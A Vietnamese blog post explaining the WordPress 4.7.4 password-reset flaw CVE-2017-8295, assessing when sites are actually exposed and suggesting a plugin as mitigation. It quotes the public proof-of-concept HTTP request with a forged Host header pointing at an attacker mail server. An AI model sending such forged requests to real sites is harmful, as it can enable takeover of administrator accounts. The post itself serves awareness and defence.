Thứ Bảy, Tháng Mười 1, 2022
Trang chủ WORDPRESS LỖI 0-DAY CỦA WORDPRESS 4.7.4 VÀ NÓ CÓ NGUY HẠI KHÔNG?

LỖI 0-DAY CỦA WORDPRESS 4.7.4 VÀ NÓ CÓ NGUY HẠI KHÔNG?

Hôm nay có thể bạn đã từng nghe qua thông báo của mọi người rằng WordPress 4.7.4 được phát hiện một lỗi 0-day (CVE-2017-8295) giúp tin tặc có thể lấy mật khẩu của người quản trị cao nhất là admin thông qua việc reset mật khẩu không cần cấp quyền vào email của chủ sỡ hữu.

LỖI 0-DAY CỦA WORDPRESS 4.7.4 VÀ NÓ CÓ NGUY HẠI KHÔNG?

Về chi tiết lỗi này bạn có thể tham khảo diễn giải chi tiết tại https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html.

Tuy nhiên trong bài viết này mình sẽ giải thích thêm và chúng ta có thể biết rằng bạn có nguy cơ bị khai thác hay không, từ đó mới áp dụng cách cài plugin chặn reset mật khẩu.

KỊCH BẢN TẤN CÔNG

Theo ExplotItBox, đầu tiên tin tặc sẽ gửi một truy vấn HTTP tới website thông qua địa chỉ IP, nghĩa là website của bạn phải truy cập được thông qua IP. Nếu bạn nào dùng Shared Hosting sử dụng cPanel bản mới nhất thì không cần lo lắng nữa vì trước đây lâu lắm rồi họ đã có một bản vá về lỗi 0-day trên Linux, và với Shared Hosting bạn cũng không thể truy cập vào website thông qua IP.

-----[ HTTP Request ]----

POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: injected-attackers-mxserver.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
user_login=admin&redirect_to=&wp-submit=Get+New+Password

Ở đoạn trên, tin tặc sẽ ghim địa chỉ máy chủ email của họ vào. Trên Apache thì SERVER_NAME sẽ tự động thay thế bằng giá trị HOST trong truy vấn trên. Tức là địa chỉ máy chủ email của tin tặc.

Khi đó, người quản trị sẽ nhận 1 email như sau:

Subject: [CompanyX WP] Password Reset
Return-Path: <wordpress@attackers-mxserver.com>
From: WordPress <wordpress@attackers-mxserver.com>
Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com>
X-Priority: 3
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Someone requested that the password be reset for the following account:

http://companyX-wp/wp/wordpress/

Username: admin

If this was a mistake, just ignore this email and nothing will happen.

To reset your password, visit the following address:

<http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin>

Bạn sẽ thấy phần Return-Path sẽ chứa giá trị mà WordPress 4.7.4 tự điền vào giá trị SERVER_NAME, tức là wordpress@địa-chỉ-máy-chủ-email-tin-tặc.ltd và kể cả Message-ID cũng chứa một địa chỉ của tin tặc.

Như vậy là đã rõ, nếu hệ thống hoặc người dùng vô tình phản hồi email này. Tin tặc sẽ nhận chính cái nội dung email chứa khóa khôi phục mật khẩu quản trị. Như vậy ta sẽ có 3 trường hợp như sau:

  1. Một số email của người quản trị có tính năng tự động trả lời email kèm nội dung email.
  2. Tin tặc sẽ gửi một lượng lớn email khiến máy chủ của người dùng bị ngập lụt dung lượng. Hay đại loại vậy khiến email không thể gửi đi và phản hồi ngược lại.
  3. Nếu người dùng quản trị dùng email của Gmail hay các nhà cung cấp mail khác. Tin tặc sẽ phải gửi một lượng lớn truy vấn như trên để nhà cung cấp chặn địa chỉ máy chủ tin tặc. Từ đó email không thể gửi đi và phản hồi ngược lại.

VẬY ĐIỀU NÀY CÓ NGUY HIỂM VỚI BẠN KHÔNG?

Suy xét ra thì lỗi này sẽ nghiêm trọng và bạn có thể bị ảnh hưởng nếu:

  • Bạn đang dùng webserver Apache và có thể truy cập vào website thông qua IP. Nghĩa là không tạo virtualhost ấy.
  • Tin tặc phải biết được tên đăng nhập của người quản trị.
  • Tập tin wp-login.php phải được truy cập trực tiếp. Một số plugin ẩn đường dẫn đăng nhập như iThemes Security sẽ tự động chặn truy cập trực tiếp qua tập tin này. Ví dụ: https://thachpham.com/wp-login.php.
  • Người quản trị phải dùng email tự host thì sẽ may ra có nguy cơ. Còn Gmail thì phải gửi một lượng email cực lớn cùng lúc họ mới chặn một máy chủ gửi đi.

Như vậy nếu bạn thỏa mãn các điều kiện trên thì có thể phòng chống bằng cách cài plugin Disable Password Reset để chặn chức năng quên mật khẩu đi. Còn nếu không thì lỗi này cũng không thật sự quá nguy hiểm như chúng ta tưởng tượng. Tuy nhiên trong tương lai, WordPress 4.7.4 sẽ ra một bản vá để chúng ta yên tâm hơn.

Nguồn copy: Thachpham

BÌNH LUẬN

Vui lòng nhập bình luận của bạn
Vui lòng nhập tên của bạn ở đây

- Advertisment -

Most Popular

6 WEBSITES HAY ĐỂ HỌC JAVASCRIPT

Mặc dù blog mình đã có bài Học Javascript căn bản khá chi tiết và vui nhộn, nhưng nhiêu đó thật sự chưa đủ để...

4 CÔNG CỤ HỖ TRỢ DỊCH FILE PO NHANH HƠN

Việc sửa file .po mình đã có nói sơ qua bằng minh họa video hướng dẫn tự dịch Woocommerce, đồng thời mình cũng có nói...

TÀI NGUYÊN TRA CỨU HÀM VÀ HOOK

Ở đây mình sẽ giới thiệu bạn qua các tài nguyên tra cứu hàm và hook mà có thể giúp bạn tra cứu tất...

PHP CHO WORDPRESS VÀ CÁC TÀI NGUYÊN CẦN THIẾT

Hôm nay mình quyết định sẽ viết một bài guide là bài này để hướng dẫn bạn từng bước tìm hiểu PHP và các...

Recent Comments